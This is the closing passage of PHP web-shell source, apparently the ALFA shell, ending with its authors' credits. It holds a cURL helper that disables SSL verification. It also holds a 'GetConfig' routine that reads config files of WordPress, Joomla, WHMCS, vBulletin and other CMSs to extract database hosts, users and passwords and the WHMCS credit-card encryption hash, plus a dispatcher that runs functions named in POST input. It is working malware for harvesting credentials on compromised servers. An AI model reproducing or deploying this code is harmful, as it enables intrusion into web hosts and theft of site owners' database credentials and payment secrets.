6038curl_setopt($process, CURLOPT_TIMEOUT, 30);
6039if($this->ssl){
6040curl_setopt($process, CURLOPT_SSL_VERIFYPEER ,false);
6041curl_setopt($process, CURLOPT_SSL_VERIFYHOST,false);
6042}
6043if($this->cookies){
6044curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
6045curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
6046}
6047if($this->proxy){
6048curl_setopt($process, CURLOPT_PROXY, $this->proxy);
6049}
6050if($method=='post'){
6051curl_setopt($process, CURLOPT_POSTFIELDS, $data);
6052curl_setopt($process, CURLOPT_POST, 1);
6053curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
6054}
6055$return = curl_exec($process);
6056curl_close($process);
6057return $return;
6058}
6059function error($error) {
6060echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
6061die;
6062}
6063}
6064function getConfigHtml($cms){
6065$content = '';
6066$cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke","phpbb"=>"PHPBB","mybb"=>"MyBB","drupal"=>"Drupal","smf"=>"SMF");
6067$content .= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
6068foreach($cms_array as $key => $val){
6069$content .= "<option value='{$key}' ".($key==$cms?'selected=selected':'').">{$val}</option>";
6070}
6071$content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='".$_SERVER['DOCUMENT_ROOT']."/' size='30' /> <button class='button'>GetConfig</button>";
6072$content .= "</form>";
6073return $content;
6074}
6075function alfaGetConfig(){
6076$cms = $_POST['alfa1'];
6077$path = trim($_POST['alfa2']);
6078$config = array(
6079'wp'=>array('file'=>'/wp-config.php',
6080'host'=>array("/define\('DB_HOST',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6081'dbname'=>array("/define\('DB_NAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6082'dbuser'=>array("/define\('DB_USER',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6083'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6084'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6085),
6086'drupal'=>array('file'=>'/config.php',
6087'host'=>array("/define\('DB_HOSTNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6088'dbname'=>array("/define\('DB_DATABASE',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6089'dbuser'=>array("/define\('DB_USERNAME',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6090'dbpw'=>array("/define\('DB_PASSWORD',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2),
6091'prefix'=>array("/define\('DB_PREFIX',(\s+)(?:'|\")(.*?)(?:'|\")\);/",2)
6092),
6093'vb'=>array('file'=>'/includes/config.php',
6094'host'=>array("/config\['MasterServer'\]\['servername'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6095'dbuser'=>array("/config\['MasterServer'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6096'dbname'=>array("/config\['Database'\]\['dbname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6097'dbpw'=>array("/config\['MasterServer'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6098'prefix'=>array("/config\['Database'\]\['tableprefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6099),
6100'phpnuke'=>array('file'=>'/config.php',
6101'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6102'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6103'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6104'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
6105'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
6106),
6107'smf'=>array('file'=>'/Settings.php',
6108'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6109'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6110'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6111'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6112'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6113),
6114'whmcs'=>array('file'=>'/configuration.php',
6115'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6116'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6117'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6118'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6119'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6120),
6121'joomla'=>array('file'=>'/configuration.php',
6122'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6123'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6124'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6125'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6126'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6127),
6128'phpbb'=>array('file'=>'/config.php',
6129'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6130'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6131'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6132'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6133'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6134),
6135'mybb'=>array('file'=>'/inc/config.php',
6136'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6137'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6138'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6139'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
6140'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
6141)
6142);
6143$data = array();
6144$srch_host = $config[$cms]['host'][0];
6145$srch_user = $config[$cms]['dbuser'][0];
6146$srch_name = $config[$cms]['dbname'][0];
6147$srch_pw = $config[$cms]['dbpw'][0];
6148$prefix = $config[$cms]['prefix'][0];
6149$file = $config[$cms]['file'];
6150$chost = $config[$cms]['host'][1];
6151$cuser = $config[$cms]['dbuser'][1];
6152$cname = $config[$cms]['dbname'][1];
6153$cpw = $config[$cms]['dbpw'][1];
6154$cprefix = $config[$cms]['prefix'][1];
6155if(@is_dir($path)||_alfa_is_dir($path)){
6156$file=$path.$file;
6157}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
6158$file=$path;
6159}else{
6160return false;
6161}
6162$file = __read_file($file);
6163if(preg_match($srch_host, $file, $mach)){
6164$data['host'] = $mach[$chost];
6165}
6166if(preg_match($srch_user, $file, $mach)){
6167$data['user'] = $mach[$cuser];
6168}
6169if(preg_match($srch_name, $file, $mach)){
6170$data['dbname'] = $mach[$cname];
6171}
6172if(preg_match($srch_pw, $file, $mach)){
6173$data['password'] = $mach[$cpw];
6174}
6175if(isset($prefix)){
6176if(preg_match($prefix, $file, $mach)){
6177$data['prefix'] = $mach[$cprefix];
6178}
6179}
6180if($cms=='whmcs'){
6181if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
6182$data['cc_encryption_hash'] = $mach[3];
6183}
6184}
6185echo json_encode($data);
6186}
6187if(empty($_POST['a']))
6188if(isset($default_action) && function_exists('alfa' . $default_action))
6189$_POST['a'] = $default_action;
6190else
6191$_POST['a'] = 'FilesMan';
6192if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
6193call_user_func('alfa' . $_POST['a']);
6194exit;
6195/*
6196#Persian Gulf For Ever
6197#skype : sole.sad
6198#skype : ehsan.invisible
6199*/
6200?>